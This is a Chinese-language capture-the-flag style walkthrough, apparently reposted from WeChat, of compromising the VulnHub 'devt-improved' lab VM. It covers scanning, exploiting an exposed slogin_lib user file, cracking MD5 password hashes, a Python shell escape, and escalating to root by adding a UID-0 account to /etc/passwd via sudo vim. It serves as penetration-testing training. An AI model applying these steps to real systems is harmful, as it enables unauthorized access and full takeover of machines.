vulnhub之devt-improved的实践

admin

131485
文章

107
评论

2025年1月20日13:14:15评论6 views字数 1116阅读3分43秒阅读模式

本周实践的是vulnhub的devt-improved镜像，

下载地址，https://download.vulnhub.com/digitalworld/devt-improved.7z，

用workstation导入成功，

做地址扫描，sudo netdiscover -r 192.168.131.0/24，

获取到靶机地址是192.168.131.139，

继续做端口扫描，sudo nmap -sS -sV -T5 -A -p- 192.168.131.139，

获取到两个后面需要用到的靶机开放的服务，

22端口的ssh和8080端口的http，

浏览器访问http://192.168.131.139:8080，获取到html_pages，

浏览器访问http://192.168.131.139:8080/html_pages，

获取到development.html，

浏览器访问http://192.168.131.139:8080/development.html，

在页面源码中获取到developmentsecretpage，

浏览器访问http://192.168.131.139:8080/developmentsecretpage，

获取到patrick的登录链接，

点击进入，获取到注销链接，

注销后获取到登录登录链接，

用admin/1234登录成功，获取到slogin_lib.inc.php，

在网上搜到漏洞利用方法，slog_users.txt，

浏览器访问http://192.168.131.139:8080/developmentsecretpage/slog_users.txt，

获取到patrick, 87e6d56ce79af90dbe07d387d3d0579e，

在线md5破解，获取到P@ssw0rd25，

还有intern, 4a8a2b374f463b7aedbb44a066363b81，

在线md5破解，获取到12345678900987654321，

用intern做为用户名登录，ssh [email protected]，

切到bash，echo os.system('/bin/bash')，

再切到patrick用户，su patrick，

查看root权限程序，sudo -l，获取到/usr/bin/vim，

准备一套root权限的用户名密码，写入/etc/passwd，

hacker:sa3tHJ3/KuYvI:0:0:hacker:/root:/bin/bash，

切到hacker用户，su hacker，id确认是root，

原文始发于微信公众号（云计算和网络安全技术实践）：vulnhub之devt-improved的实践

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

vulnhub之devt-improved的实践

攻防靶场(59)：哇好快 OnSystemShellDredd

关于PAN-OS DoS(CVE-2024-3393)的研究

DeepSeek-R1展示了小模型也能成为推理专家

Cobalt Strike 和一对 SOCKS 代理引发 LockBit 勒索软件事件

州弟的完全仿真代码审计环境

基于Linux的僵尸网络构建器，构建高级隐秘僵尸网络负载

从小白开发渗透工具视角入手，探究普通的DeepSeek和深度思考DeepSeek！

华为： Al系统的网络安全治理实践

使用ollama+chatboxai本地部署DeepSeek-R1

[靶场复现计划]CSLAB Thunder

发表评论